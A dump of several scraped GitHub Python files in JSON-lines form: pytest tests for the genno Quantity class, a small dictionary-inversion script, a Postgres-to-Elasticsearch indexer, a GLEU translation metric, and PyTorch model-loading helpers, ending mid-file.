check_type=True)\n\n def test_assert_with_attrs(self, a):\n \"\"\"Test assertions about Quantity with attrs.\n\n Here direct pd.Series and xr.DataArray comparisons are *not* possible.\n \"\"\"\n attrs = {\"foo\": \"bar\"}\n a.attrs = attrs\n\n b = Quantity(a)\n\n # make sure it has the correct property\n assert a.attrs == attrs\n assert b.attrs == attrs\n\n assert_qty_equal(a, b)\n assert_qty_equal(b, a)\n assert_qty_allclose(a, b)\n assert_qty_allclose(b, a)\n\n # check_attrs=False allows a successful equals assertion even when the\n # attrs are different\n a.attrs = {\"bar\": \"foo\"}\n assert_qty_equal(a, b, check_attrs=False)\n\n def test_assign_coords(self, a):\n # Relabel an existing dimension\n q1 = a.assign_coords({\"p\": [\"apple\", \"orange\"]})\n assert (\"p\",) == q1.dims\n assert all([\"apple\", \"orange\"] == q1.coords[\"p\"])\n\n # Exception raised when the values are of the wrong length\n with pytest.raises(\n ValueError,\n match=\"conflicting sizes for dimension 'p': length 2 .* and length 3\",\n ):\n a.assign_coords({\"p\": [\"apple\", \"orange\", \"banana\"]})\n with pytest.raises(\n ValueError,\n match=\"conflicting sizes for dimension 'p': length 2 .* and length 1\",\n ):\n a.assign_coords({\"p\": [\"apple\"]})\n\n @pytest.fixture()\n def tri(self):\n \"\"\"Fixture returning triangular data to test fill, shift, etc.\"\"\"\n return Quantity(\n xr.DataArray(\n [\n [nan, nan, 1.0, nan, nan],\n [nan, 2, 3, 4, nan],\n [5, 6, 7, 8, 9],\n ],\n coords=[\n (\"x\", [\"x0\", \"x1\", \"x2\"]),\n (\"y\", [\"y0\", \"y1\", \"y2\", \"y3\", \"y4\"]),\n ],\n ),\n units=\"kg\",\n )\n\n def test_astype(self, tri):\n result = tri.astype(float)\n assert float == result.dtype\n\n def test_bfill(self, tri):\n \"\"\"Test Quantity.bfill().\"\"\"\n if Quantity._get_class() is SparseDataArray:\n pytest.xfail(reason=\"sparse.COO.flip() not implemented\")\n\n r1 = tri.bfill(\"x\")\n assert r1.loc[\"x0\", \"y0\"] == tri.loc[\"x2\", \"y0\"]\n\n r2 = tri.bfill(\"y\")\n assert r2.loc[\"x0\", \"y0\"] == tri.loc[\"x0\", \"y2\"]\n\n def test_coords(self, tri):\n coords = tri.coords\n assert isinstance(coords, xr.core.coordinates.Coordinates)\n assert [\"x\", \"y\"] == list(coords)\n assert \"x\" in coords # __contains__\n\n assert isinstance(coords[\"x\"], xr.DataArray)\n\n coords = Quantity(3, units=\"kg\").coords\n assert [] == list(coords)\n\n def test_copy_modify(self, a):\n \"\"\"Making a Quantity another produces a distinct attrs dictionary.\"\"\"\n assert 0 == len(a.attrs)\n\n a.units = pint.Unit(\"km\")\n\n b = Quantity(a, units=\"kg\")\n assert pint.Unit(\"kg\") == b.units\n\n assert pint.Unit(\"km\") == a.units\n\n def test_cumprod(self, caplog, tri):\n \"\"\"Test Quantity.cumprod().\"\"\"\n if Quantity._get_class() is SparseDataArray:\n pytest.xfail(reason=\"sparse.COO.nancumprod() not implemented\")\n\n caplog.set_level(logging.INFO)\n\n args = dict(axis=123) if Quantity._get_class() is AttrSeries else dict()\n r1 = tri.cumprod(\"x\", **args)\n assert 1 * 3 * 7 == r1.loc[\"x2\", \"y2\"]\n if Quantity._get_class() is AttrSeries:\n assert [\"AttrSeries.cumprod(…, axis=…) is ignored\"] == caplog.messages\n\n r2 = tri.cumprod(\"y\")\n assert 2 * 3 == r2.loc[\"x1\", \"y2\"]\n assert 5 * 6 * 7 * 8 * 9 == r2.loc[\"x2\", \"y4\"]\n\n def test_drop_vars(self, a):\n a.expand_dims({\"phase\": [\"liquid\"]}).drop_vars(\"phase\")\n\n def test_expand_dims(self, a):\n # Single label on a new dimension\n q0 = a.expand_dims({\"phase\": [\"liquid\"]})\n assert (\"phase\", \"p\") == q0.dims\n\n # New dimension(s) without labels\n q1 = a.expand_dims([\"phase\"])\n assert (\"phase\", \"p\") == q1.dims\n assert 2 == q1.size\n assert (1, 2) == q1.shape\n\n # New dimension(s) without labels\n q2 = a.expand_dims({\"phase\": []})\n assert (\"phase\", \"p\") == q2.dims\n if Quantity._get_class() is AttrSeries:\n # NB this behaviour differs slightly from xr.DataArray.expand_dims()\n assert (1, 2) == q2.shape\n assert 2 == q2.size\n else:\n # da = xr.DataArray([0.8, 0.2], coords=[[\"oil\", \"water\"]], dims=[\"p\"])\n # assert (0, 2) == da.expand_dims({\"phase\": []}).shape # Different result\n # assert (1, 2) == da.expand_dims([\"phase\"]).shape # Same result\n\n assert (0, 2) == q2.shape\n assert 0 == q2.size\n\n # Multiple labels\n q3 = a.expand_dims({\"phase\": [\"liquid\", \"solid\"]})\n assert (\"phase\", \"p\") == q3.dims\n assert all([\"liquid\", \"solid\"] == q3.coords[\"phase\"])\n\n # Multiple dimensions and labels\n q4 = a.expand_dims({\"colour\": [\"red\", \"blue\"], \"phase\": [\"liquid\", \"solid\"]})\n assert (\"colour\", \"phase\", \"p\") == q4.dims\n\n def test_ffill(self, tri):\n \"\"\"Test Quantity.ffill().\"\"\"\n\n # Forward fill along \"x\" dimension results in no change\n r1 = tri.ffill(\"x\")\n assert_qty_equal(tri, r1)\n\n # Forward fill along y dimension works\n r2 = tri.ffill(\"y\")\n\n # Check some filled values\n assert (\n r2.loc[\"x0\", \"y4\"].item()\n == r2.loc[\"x0\", \"y3\"].item()\n == tri.loc[\"x0\", \"y2\"].item()\n )\n\n def test_pipe(self, ureg, tri):\n result = tri.pipe(computations.assign_units, \"km\")\n assert ureg.Unit(\"km\") == result.units\n\n def test_sel(self, tri):\n # Create indexers\n newdim = [(\"newdim\", [\"nd0\", \"nd1\", \"nd2\"])]\n x_idx = xr.DataArray([\"x2\", \"x1\", \"x2\"], coords=newdim)\n y_idx = xr.DataArray([\"y4\", \"y2\", \"y0\"], coords=newdim)\n\n # Select using the indexers\n # NB with pandas 2.1, this triggers the RecursionError fixed in khaeru/genno#99\n assert_qty_equal(\n Quantity(xr.DataArray([9.0, 3.0, 5.0], coords=newdim), units=\"kg\"),\n tri.sel(x=x_idx, y=y_idx),\n ignore_extra_coords=True,\n )\n\n # Exception raised for mismatched lengths\n with pytest.raises(IndexError, match=\"Dimensions of indexers mismatch\"):\n tri.sel(x=x_idx[:-1], y=y_idx)\n\n def test_shift(self, tri):\n \"\"\"Test Quantity.shift().\"\"\"\n if Quantity._get_class() is SparseDataArray:\n pytest.xfail(reason=\"sparse.COO.pad() not implemented\")\n\n r1 = tri.shift(x=1)\n assert r1.loc[\"x2\", \"y1\"] == tri.loc[\"x1\", \"y1\"]\n\n r2 = tri.shift(y=2)\n assert r2.loc[\"x2\", \"y4\"] == tri.loc[\"x2\", \"y2\"]\n\n r3 = tri.shift(x=1, y=2)\n assert r3.loc[\"x2\", \"y4\"] == tri.loc[\"x1\", \"y2\"]\n\n def test_size(self):\n \"\"\"Stress-test reporting of large, sparse quantities.\"\"\"\n # Create the Reporter\n c = Computer()\n\n # Prepare large data, store the keys of the quantities\n keys = add_large_data(c, num_params=10)\n\n # Add a task to compute the product, i.e. requires all the q_*\n c.add(\"bigmem\", tuple([computations.mul] + keys))\n\n # One quantity fits in memory\n c.get(keys[0])\n\n if Quantity._get_class() is SparseDataArray:\n pytest.xfail(\n reason='\"IndexError: Only one-dimensional iterable indices supported.\" '\n \"in sparse._coo.indexing\"\n )\n\n # All quantities can be multiplied without raising MemoryError\n result = c.get(\"bigmem\")\n\n # Result can be converted to pd.Series\n result.to_series()\n\n def test_to_dataframe(self, a):\n \"\"\"Test Quantity.to_dataframe().\"\"\"\n # Returns pd.DataFrame\n result = a.to_dataframe()\n assert isinstance(result, pd.DataFrame)\n\n # \"value\" is used as a column name\n assert [\"value\"] == result.columns\n\n # Explicitly passed name produces a named column\n assert [\"foo\"] == a.to_dataframe(\"foo\").columns\n\n with pytest.raises(NotImplementedError):\n a.to_dataframe(dim_order=[\"foo\", \"bar\"])\n\n def test_to_series(self, a):\n \"\"\"Test .to_series() on child classes, and Quantity.from_series.\"\"\"\n s = a.to_series()\n assert isinstance(s, pd.Series)\n\n Quantity.from_series(s)\n\n def test_units(self, a):\n # Units can be retrieved; dimensionless by default\n assert a.units.dimensionless\n\n # Set with a string results in a pint.Unit instance\n a.units = \"kg\"\n assert pint.Unit(\"kg\") == a.units\n\n # Can be set to dimensionless\n a.units = \"\"\n assert a.units.dimensionless\n\n @pytest.mark.parametrize(\n \"op\", [operator.add, operator.mul, operator.sub, operator.truediv]\n )\n @pytest.mark.parametrize(\"type_\", [int, float, param(str, marks=pytest.mark.xfail)])\n def test_arithmetic(self, op, type_, a):\n \"\"\"Quantity can be added to int or float.\"\"\"\n result = op(type_(4.2), a)\n\n assert (2,) == result.shape\n assert a.dtype == result.dtype\n\n\n@pytest.mark.parametrize(\n \"value\",\n [\n 2,\n # Fails for SparseDataArray, not AttrSeries\n pytest.param(np.int64(2), marks=pytest.mark.xfail(raises=ValueError)),\n 1.1,\n np.float64(1.1),\n pytest.param([0.1, 2.3], marks=pytest.mark.xfail(raises=AssertionError)),\n ],\n)\ndef test_possible_scalar(value):\n tmp = possible_scalar(value)\n assert isinstance(tmp, Quantity), type(tmp)\n assert tuple() == tmp.dims\n\n assert value == unwrap_scalar(tmp)\n","repo_name":"khaeru/genno","sub_path":"genno/tests/core/test_quantity.py","file_name":"test_quantity.py","file_ext":"py","file_size_in_byte":12429,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"35847459932","text":"def dictonary():\r\n r = {}\r\n while True:\r\n print('enter key (enter stop - exit)')\r\n k = input()\r\n if k == 'stop':\r\n break\r\n print('enter value')\r\n v = input()\r\n r[k] = v\r\n return r \r\nd = dictonary()\r\nprint(d, {v: k for k, v in d.items()}, sep = '\\n')","repo_name":"maxred92/TMS-z32-onl","sub_path":"homework_6/exercise_0.py","file_name":"exercise_0.py","file_ext":"py","file_size_in_byte":311,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"32070460435","text":"import json\nfrom dataclasses import dataclass\nfrom typing import Tuple, List\n\nimport backoff\nimport psycopg2\nimport requests\nfrom elasticsearch import Elasticsearch, NotFoundError\nfrom psycopg2.extras import DictCursor, RealDictCursor\n\n\n@dataclass\nclass IndexBuilder:\n index_name: str\n model_from_postgres: str\n fields: list\n\n\nclass Indexer(object):\n\n def __init__(self, elasticsearch_client: Elasticsearch, new_index: IndexBuilder, body: dict):\n self.elastic = elasticsearch_client\n self.elastic_request = 'http://localhost:9200'\n self.index_name = new_index.index_name\n self.fields = new_index.fields\n self.model = new_index.model_from_postgres\n self.pg_conn = self._connection_postgres()\n self.cursor = self.pg_conn.cursor(cursor_factory=RealDictCursor)\n self.body = body\n\n @staticmethod\n def _connection_postgres():\n \"\"\"Подключение к POSTGRES.\"\"\"\n dsl = {'dbname': 'movies_yandex', 'user': 'postgres', 'password': 12345, 'host': 'db,', 'port': 5432}\n\n return psycopg2.connect(**dsl, cursor_factory=DictCursor)\n\n def _execute_query(self, query: str, params: Tuple[str]) -> List[dict]:\n \"\"\"\n Выполнение запроса к POSTGRES.\n В случае ошибки, проверка соединения и повторное попытка в соответсвии с модулем backoff\n \"\"\"\n if not self.pg_conn or self.pg_conn.closed:\n self.pg_conn = self._connection_postgres()\n self.cursor = self.pg_conn.cursor(cursor_factory=RealDictCursor)\n\n self.cursor.execute(query, params)\n\n return self.cursor.fetchall()\n\n def _check_index(self, index_name: str):\n \"\"\"Проверяет наличие индекса, если он есть возвращает его\"\"\"\n result = requests.get(f'{self.elastic_request}/{index_name}')\n if result:\n return result\n return False\n\n def _build_new_cards_index(self):\n \"\"\"Если индекса еще не существует то создает его\"\"\"\n index = self._check_index(self.index_name)\n if index:\n return index\n else:\n index = self.create_empty_cards_index(self.index_name)\n\n return index\n\n def _collect_card_from_sql(self):\n \"\"\"Собирает данные из Postgres\"\"\"\n query = f\"\"\"\n SELECT *\n FROM {self.model} \n \"\"\"\n cards = self._execute_query(query, params=('',))\n\n return cards\n\n def _transform_cards_to_elastic_format(self, cards):\n \"\"\"Трансформирует данные для ELASTIC\"\"\"\n card_data = {}\n for row in cards:\n if row['id'] in card_data:\n data_card = card_data[row['id']]\n else:\n data_card = {}\n for field in self.fields:\n data_card[field] = row[field]\n\n card_data[row['id']] = data_card\n\n return card_data.values()\n\n @backoff.on_exception(backoff.expo,\n Exception,\n jitter=None,\n max_tries=10)\n def request_post(self, query: str) -> str:\n \"\"\"\n Отправка запроса в ES и возврат ответа\n \"\"\"\n\n return requests.post(\n f'{self.elastic_request}/{self.index_name}/_bulk',\n data=query,\n headers={\n 'Content-type': 'application/x-ndjson'\n }\n ).content.decode()\n\n def _get_es_bulk_query(self, rows: List[dict], index_name: str) -> List[str]:\n \"\"\"\n подготовка bulk запроса в Elasticsearch\n \"\"\"\n prepared_query = []\n for row in rows:\n prepared_query.extend([\n json.dumps({'index': {'_index': index_name, '_id': row['id']}}),\n json.dumps(row)\n ])\n return prepared_query\n\n def load_to_es(self, records: List[dict], index_name: str) -> None:\n \"\"\"\n Отправка запроса и разбор его ошибок\n \"\"\"\n print('start WORK')\n prepared_query = self._get_es_bulk_query(records, index_name)\n str_query = '\\n'.join(prepared_query) + '\\n'\n\n self.request_post(str_query)\n\n def create_empty_cards_index(self, index_name):\n \"\"\"Создает новый индекс\"\"\"\n try:\n new_index = self.elastic.create(index=index_name, body=self.body)\n except Exception as e:\n print(e)\n new_index = None\n\n return new_index\n\n def complete_index(self):\n \"\"\"MAIN функция которые создает наполняет и возвращает индекс\"\"\"\n self._build_new_cards_index()\n\n cards = self._collect_card_from_sql()\n\n if cards:\n data = self._transform_cards_to_elastic_format(cards)\n self.load_to_es(records=data, index_name=self.index_name)\n return True\n\n return False\n","repo_name":"Q1nfo/fastapi-movie","sub_path":"src/services/elastic.py","file_name":"elastic.py","file_ext":"py","file_size_in_byte":5178,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"6979722154","text":"from collections import Counter\nfrom itertools import chain\nfrom typing import List\n\nfrom sacrebleu.metrics.bleu import _get_tokenizer\nfrom telescope.metrics.metric import Metric\nfrom telescope.metrics.result import MetricResult\n\n\nclass GLEU(Metric):\n\n name = \"GLEU\"\n segment_level = True\n\n def __init__(self, language: str, lowercase: bool = False, tokenize: bool = True):\n super().__init__(language)\n if language == \"zh\":\n self.tokenizer = _get_tokenizer(\"zh\")()\n elif language == \"ja\":\n self.tokenizer = _get_tokenizer(\"ja-mecab\")()\n else:\n self.tokenizer = _get_tokenizer(\"13a\")()\n\n self.lowercase = lowercase\n self.tokenize = tokenize\n\n def score(self, src: List[str], cand: List[str], ref: List[str]) -> MetricResult:\n org_cand = cand\n org_ref = ref\n if self.tokenize:\n cand = [self.tokenizer(c.strip(\"\\n\")) for c in cand]\n ref = [self.tokenizer(r.strip(\"\\n\")) for r in ref]\n else:\n cand = [c.strip(\"\\n\").split(\" \") for c in cand]\n ref = [r.strip(\"\\n\").split(\" \") for r in ref]\n\n if self.lowercase:\n cand = [c.lower() for c in cand]\n ref = [r.lower() for r in ref]\n\n segment_gleu = [self.sentence_gleu(r, h) for r, h in zip(ref, cand)]\n corpus_gleu = sum(segment_gleu) / len(segment_gleu)\n cand = [\" \".join(seg) for seg in cand]\n ref = [\" \".join(seg) for seg in ref]\n return MetricResult(\n corpus_gleu, segment_gleu, src, org_cand, org_ref, self.name\n )\n\n def sentence_gleu(self, reference, hypothesis, min_len=1, max_len=4):\n references = [\n reference,\n ]\n return self.algorithm(\n [references], [hypothesis], min_len=min_len, max_len=max_len\n )\n\n def algorithm(self, list_of_references, hypotheses, min_len=1, max_len=4):\n \"\"\"Original code from NLTK:\n https://www.nltk.org/_modules/nltk/translate/gleu_score.html\n\n \"\"\"\n assert len(list_of_references) == len(\n hypotheses\n ), \"The number of hypotheses and their reference(s) should be the same\"\n\n # sum matches and max-token-lengths over all sentences\n corpus_n_match = 0\n corpus_n_all = 0\n\n for references, hypothesis in zip(list_of_references, hypotheses):\n hyp_ngrams = Counter(self.everygrams(hypothesis, min_len, max_len))\n tpfp = sum(hyp_ngrams.values()) # True positives + False positives.\n\n hyp_counts = []\n for reference in references:\n ref_ngrams = Counter(self.everygrams(reference, min_len, max_len))\n tpfn = sum(ref_ngrams.values()) # True positives + False negatives.\n\n overlap_ngrams = ref_ngrams & hyp_ngrams\n tp = sum(overlap_ngrams.values()) # True positives.\n\n # While GLEU is defined as the minimum of precision and\n # recall, we can reduce the number of division operations by one by\n # instead finding the maximum of the denominators for the precision\n # and recall formulae, since the numerators are the same:\n # precision = tp / tpfp\n # recall = tp / tpfn\n # gleu_score = min(precision, recall) == tp / max(tpfp, tpfn)\n n_all = max(tpfp, tpfn)\n\n if n_all > 0:\n hyp_counts.append((tp, n_all))\n\n # use the reference yielding the highest score\n if hyp_counts:\n n_match, n_all = max(hyp_counts, key=lambda hc: hc[0] / hc[1])\n corpus_n_match += n_match\n corpus_n_all += n_all\n\n # corner case: empty corpus or empty references---don't divide by zero!\n if corpus_n_all == 0:\n gleu_score = 0.0\n else:\n gleu_score = corpus_n_match / corpus_n_all\n\n return gleu_score\n\n def pad_sequence(\n self,\n sequence,\n n,\n pad_left=False,\n pad_right=False,\n left_pad_symbol=None,\n right_pad_symbol=None,\n ):\n sequence = iter(sequence)\n if pad_left:\n sequence = chain((left_pad_symbol,) * (n - 1), sequence)\n if pad_right:\n sequence = chain(sequence, (right_pad_symbol,) * (n - 1))\n return sequence\n\n def ngrams(\n self,\n sequence,\n n,\n pad_left=False,\n pad_right=False,\n left_pad_symbol=None,\n right_pad_symbol=None,\n ):\n sequence = self.pad_sequence(\n sequence, n, pad_left, pad_right, left_pad_symbol, right_pad_symbol\n )\n history = []\n while n > 1:\n history.append(next(sequence))\n n -= 1\n for item in sequence:\n history.append(item)\n yield tuple(history)\n del history[0]\n\n def everygrams(self, sequence, min_len=1, max_len=-1, **kwargs):\n if max_len == -1:\n max_len = len(sequence)\n for n in range(min_len, max_len + 1):\n for ng in self.ngrams(sequence, n, **kwargs):\n yield ng\n","repo_name":"Unbabel/MT-Telescope","sub_path":"telescope/metrics/gleu/metric.py","file_name":"metric.py","file_ext":"py","file_size_in_byte":5214,"program_lang":"python","lang":"en","doc_type":"code","stars":34,"dataset":"github-code","pt":"31"} +{"seq_id":"6074087841","text":"# ***************************************************************************************************\n# THIS FILE HOLDS THE FUNCTIONS NEEDED TO MANIPULATE THE DATABASE ON WHICH THE NETWORK TRAINS\n# ***************************************************************************************************\n# from ConfigVAE import *\nfrom config_omega import *\nimport os\nimport csv\nimport torch\nimport torch.nn as nn\nimport numpy as np\nfrom classes.ModVAE import ModVAE\nfrom classes.TrainerVAE import TrainerVAE\nfrom classes.DecoderVAE import DecoderVAE\nfrom classes.DGcnn import ModDGCNN2\nfrom classes.TrainerDG import TrainerDG\nfrom classes.Model_CNN import CnnModel\nfrom classes.TrainerCnn import TrainerCNN\nfrom classes.Model_Omega import OmegaModel\nfrom classes.TrainerOmega import TrainerOmega\n\n\nclass ModelManipulationFunctions:\n def __init__(self):\n pass\n\n @staticmethod\n def load_state_train(data_path, device=None, thresholds=None):\n \"\"\"\n :param data_path: path to the saved data regarding the network\n :param device: allocation to either cpu of cuda:0\n :param thresholds: test group thresholds\n :return: the function loads the data into and returns the saves network and trainer\n \"\"\"\n if device is None:\n device = torch.device('cuda:0' if torch.cuda.is_available() else 'cpu')\n # -------------------------------------\n # loading the dictionary\n # -------------------------------------\n checkpoint = torch.load(data_path, map_location=device)\n\n # -------------------------------------\n # arranging the data\n # -------------------------------------\n encoder_topology = checkpoint['encoder_topology']\n decoder_topology = checkpoint['decoder_topology']\n latent_dim = checkpoint['latent_dim']\n encoder_type = checkpoint['encoder_type']\n try:\n mode = checkpoint['mode']\n model_out = checkpoint['model_out']\n except:\n mode = mode_e.AUTOENCODER\n model_out = model_output_e.SENS\n\n mod_vae = ModVAE(device=device,\n encoder_topology=encoder_topology,\n decoder_topology=decoder_topology,\n latent_space_dim=latent_dim,\n encoder_type=encoder_type,\n mode=mode,\n model_out=model_out)\n mod_vae.to(device) # allocating the computation to the CPU or GPU\n mod_vae.load_state_dict(checkpoint['vae_state_dict'])\n\n norm_sens = (SENS_MEAN, SENS_STD) if NORM_SENS else (0, 1)\n norm_grid = (GRID_MEAN, GRID_STD) if NORM_GRID else (0, 1)\n trainer = TrainerVAE(mod_vae,\n lr=checkpoint['lr'],\n mom=MOM,\n beta_dkl=checkpoint['beta_dkl'],\n beta_grid=checkpoint['beta_grid'],\n sched_step=SCHEDULER_STEP,\n sched_gamma=SCHEDULER_GAMMA,\n grad_clip=GRAD_CLIP,\n group_thresholds=thresholds,\n group_weights=MSE_GROUP_WEIGHT,\n abs_sens=ABS_SENS, norm_sens=norm_sens,\n grid_pos_weight=GRID_POS_WEIGHT,\n xquantize=XQUANTIZE, yquantize=YQUANTIZE)\n trainer.epoch = checkpoint['epoch']\n trainer.optimizer.load_state_dict(checkpoint['optimizer_state_dict'])\n\n return mod_vae, trainer\n\n @staticmethod\n def load_state_train_pcloud(data_path, device=None, thresholds=None):\n \"\"\"\n :param data_path: path to the saved data regarding the network\n :param device: allocation to either cpu of cuda:0\n :param thresholds: test group thresholds\n :return: the function loads the data into and returns the saves network and trainer\n \"\"\"\n if device is None:\n device = torch.device('cuda:0' if torch.cuda.is_available() else 'cpu')\n # -------------------------------------\n # loading the dictionary\n # -------------------------------------\n checkpoint = torch.load(data_path, map_location=device)\n\n # -------------------------------------\n # arranging the data\n # -------------------------------------\n topology = checkpoint['topology']\n model = ModDGCNN2(device, topology, flatten_type='both')\n model.to(device) # allocating the computation to the CPU or GPU\n model.load_state_dict(checkpoint['vae_state_dict'])\n\n trainer = TrainerDG(model,\n lr=checkpoint['lr'],\n mom=checkpoint['lr'],\n sched_step=SCHEDULER_STEP,\n sched_gamma=SCHEDULER_GAMMA,\n grad_clip=GRAD_CLIP,\n group_thresholds=thresholds,\n group_weights=MSE_GROUP_WEIGHT,\n abs_sens=ABS_SENS)\n trainer.epoch = checkpoint['epoch']\n trainer.optimizer.load_state_dict(checkpoint['optimizer_state_dict'])\n\n return model, trainer\n\n @staticmethod\n def load_state_train_cnn(data_path, device=None, thresholds=None):\n \"\"\"\n :param data_path: path to the saved data regarding the network\n :param device: allocation to either cpu of cuda:0\n :param thresholds: test group thresholds\n :return: the function loads the data into and returns the saves network and trainer\n \"\"\"\n if device is None:\n device = torch.device('cuda:0' if torch.cuda.is_available() else 'cpu')\n # -------------------------------------\n # loading the dictionary\n # -------------------------------------\n checkpoint = torch.load(data_path, map_location=device)\n # -------------------------------------\n # arranging the data\n # -------------------------------------\n topology = checkpoint['topology']\n model = CnnModel(device, topology, model_type=checkpoint['model_type'])\n model.to(device) # allocating the computation to the CPU or GPU\n model.load_state_dict(checkpoint['model_state_dict'])\n\n norm_sens = (SENS_MEAN, SENS_STD) if NORM_SENS else (0, 1)\n trainer = TrainerCNN(model,\n lr=checkpoint['lr'],\n mom=checkpoint['mom'],\n sched_step=SCHEDULER_STEP,\n sched_gamma=SCHEDULER_GAMMA,\n grad_clip=GRAD_CLIP,\n group_thresholds=thresholds,\n group_weights=MSE_GROUP_WEIGHT,\n abs_sens=ABS_SENS,\n norm_sens=norm_sens)\n trainer.epoch = checkpoint['epoch']\n trainer.optimizer.load_state_dict(checkpoint['optimizer_state_dict'])\n\n return model, trainer\n\n @staticmethod\n def load_decoder(data_path=None, device=None):\n \"\"\"\n :param data_path: path to the saved data regarding the network\n :param device: allocation to either cpu of cuda:0\n :return: the function returns the trained decoder\n \"\"\"\n pff = PathFindingFunctions()\n if device is None:\n device = torch.device('cuda:0' if torch.cuda.is_available() else 'cpu')\n if data_path is None:\n results_dir = os.path.join(os.path.abspath(os.getcwd()), '..\\\\results')\n data_path = pff.get_latest_model(pff.get_latest_dir(results_dir))\n\n # --------------------------------------------------------------------------------------------------------------\n # loading the dictionary\n # --------------------------------------------------------------------------------------------------------------\n checkpoint = torch.load(data_path, map_location=device)\n # --------------------------------------------------------------------------------------------------------------\n # arranging the data\n # --------------------------------------------------------------------------------------------------------------\n encoder_topology = checkpoint['encoder_topology']\n decoder_topology = checkpoint['decoder_topology']\n latent_dim = checkpoint['latent_dim']\n encoder_type = checkpoint['encoder_type']\n try:\n mode = checkpoint['mode']\n model_out = checkpoint['model_out']\n except:\n mode = mode_e.AUTOENCODER\n model_out = model_output_e.SENS\n\n mod_vae = ModVAE(device=device,\n encoder_topology=encoder_topology,\n decoder_topology=decoder_topology,\n latent_space_dim=latent_dim,\n encoder_type=encoder_type)\n mod_vae.load_state_dict(checkpoint['vae_state_dict'])\n # --------------------------------------------------------------------------------------------------------------\n # Extracting the decoder\n # --------------------------------------------------------------------------------------------------------------\n decoder = DecoderVAE(device=device, topology=decoder_topology, latent_dim=latent_dim, model_out=model_out)\n decoder.load_state_dict(mod_vae.decoder.state_dict())\n decoder.to(decoder.device)\n\n return decoder, latent_dim\n\n @staticmethod\n def load_state_train_omega(data_path, device=None, noise=False):\n \"\"\"\n :param data_path: path to the saved data regarding the network\n :param device: allocation to either cpu of cuda:0\n :param noise: if we want to introduce shot noise or not\n :return: the function loads the data into and returns the saves network and trainer\n \"\"\"\n if device is None:\n device = torch.device('cuda:0' if torch.cuda.is_available() else 'cpu')\n # -------------------------------------\n # loading the dictionary\n # -------------------------------------\n checkpoint = torch.load(data_path, map_location=device)\n # -------------------------------------\n # arranging the data\n # -------------------------------------\n topology = checkpoint['topology']\n model = OmegaModel(device, topology)\n model.to(device) # allocating the computation to the CPU or GPU\n model.load_state_dict(checkpoint['model_state_dict'])\n try:\n sampling_rate = checkpoint['sampling_rate']\n except:\n sampling_rate = 100\n trainer = TrainerOmega(model,\n num_epochs=EPOCH_NUM,\n lr=LR, mom=MOM,\n sched_step=SCHEDULER_STEP, sched_gamma=SCHEDULER_GAMMA,\n grad_clip=GRAD_CLIP,\n omega_factor=checkpoint['omega_factor'], shot_noise=noise,\n sampling_rate=sampling_rate)\n trainer.epoch = checkpoint['epoch']\n trainer.optimizer.load_state_dict(checkpoint['optimizer_state_dict'])\n\n return model, trainer\n\n @staticmethod\n def initialize_weights(net, mean=0.0, std=0.02, method='gaussian'):\n \"\"\"\n :param net: the model which is being normalized\n :param mean: the target mean of the weights\n :param std: the target standard deviation of the weights\n :param method: stated the initialization method\n :return: nothing, just adjusts the weights\n \"\"\"\n for module in net.modules():\n if isinstance(module, (nn.Conv1d, nn.Conv2d, nn.BatchNorm2d, nn.Linear, nn.ConvTranspose2d)):\n if method == 'xavier':\n if not isinstance(module, nn.BatchNorm2d):\n nn.init.xavier_normal_(module.weight.data)\n else:\n nn.init.normal_(module.weight.data, mean, std)\n elif method == 'gaussian':\n nn.init.normal_(module.weight.data, mean, std)\n else:\n raise ValueError('Weight init method is unknown!')\n\n @staticmethod\n def copy_net_weights(source_net, target_net):\n \"\"\"\n :param source_net: We copy the weights from this network\n :param target_net: We copy the weights to this network\n :return: Nothing\n \"\"\"\n for module_source, module_target in zip(source_net.encoder.modules(), target_net.encoder.modules()):\n if isinstance(module_source, (nn.Conv2d, nn.BatchNorm2d, nn.Linear, nn.BatchNorm1d, nn.ConvTranspose2d)) and isinstance(module_target, (nn.Conv2d, nn.BatchNorm2d, nn.Linear, nn.BatchNorm1d, nn.ConvTranspose2d)):\n if type(module_source) == type(module_target):\n if module_source.weight.shape == module_target.weight.shape:\n module_target.weight.data = module_source.weight.data\n module_target.bias = module_source.bias\n if isinstance(module_source, (nn.BatchNorm2d, nn.BatchNorm1d)):\n module_target.running_mean = module_source.running_mean\n module_target.running_var = module_source.running_var\n\n for module_source, module_target in zip(source_net.decoder.modules(), target_net.decoder.modules()):\n if isinstance(module_source, (nn.Conv2d, nn.BatchNorm2d, nn.Linear, nn.BatchNorm1d, nn.ConvTranspose2d)) and isinstance(module_target, (nn.Conv2d, nn.BatchNorm2d, nn.Linear, nn.BatchNorm1d, nn.ConvTranspose2d)):\n if type(module_source) == type(module_target):\n if module_source.weight.shape == module_target.weight.shape:\n module_target.weight.data = module_source.weight.data\n module_target.bias = module_source.bias\n if isinstance(module_source, (nn.BatchNorm2d, nn.BatchNorm1d)):\n module_target.running_mean = module_source.running_mean\n module_target.running_var = module_source.running_var\n\n @staticmethod\n def slice_grid(grid, threshold):\n \"\"\"\n :param grid: 2D np array of a raw model output\n :param threshold: threshold for the slicing\n :return: 2D numpy array of the sliced array\n \"\"\"\n return (grid > threshold).astype(float)\n\n @staticmethod\n def get_nof_params(model):\n \"\"\"Return the number of trainable model parameters.\n Args:\n model: nn.Module.\n Returns:\n The number of model parameters.\n \"\"\"\n return sum(p.numel() for p in model.parameters() if p.requires_grad)\n\n\nclass DatabaseFunctions:\n def __init__(self):\n pass\n\n @staticmethod\n def micrometer2pixel(arr, xrange, yrange, xquantize, yquantize):\n \"\"\"\n This function is used to convert the coordinates from micro meter to pixel values\n :param arr: (N,2) array holding the coordinates in microns\n :param xrange: range of micrometers in x axis\n :param yrange: range of micrometers in axis\n :param xquantize: quantization points in x axis\n :param yquantize: quantization points in y axis\n :return: array sized (N, 2) with the coordinates in pixel values\n \"\"\"\n grid_coords = [np.zeros([2, ]).astype(int)] * len(arr)\n for ii in range(len(arr)):\n x = float(arr[ii, 0])\n y = float(arr[ii, 1])\n x_grid = int(round(((x - xrange[0]) / xrange[1]) * (xquantize - 1), 0))\n y_grid = int(round(((y - yrange[0]) / yrange[1]) * (yquantize - 1), 0))\n grid_coords[ii] = np.array([x_grid, y_grid])\n\n return np.array(grid_coords)\n\n @staticmethod\n def points2mat(arr, xquantize, yquantize):\n \"\"\"\n THIS FILE 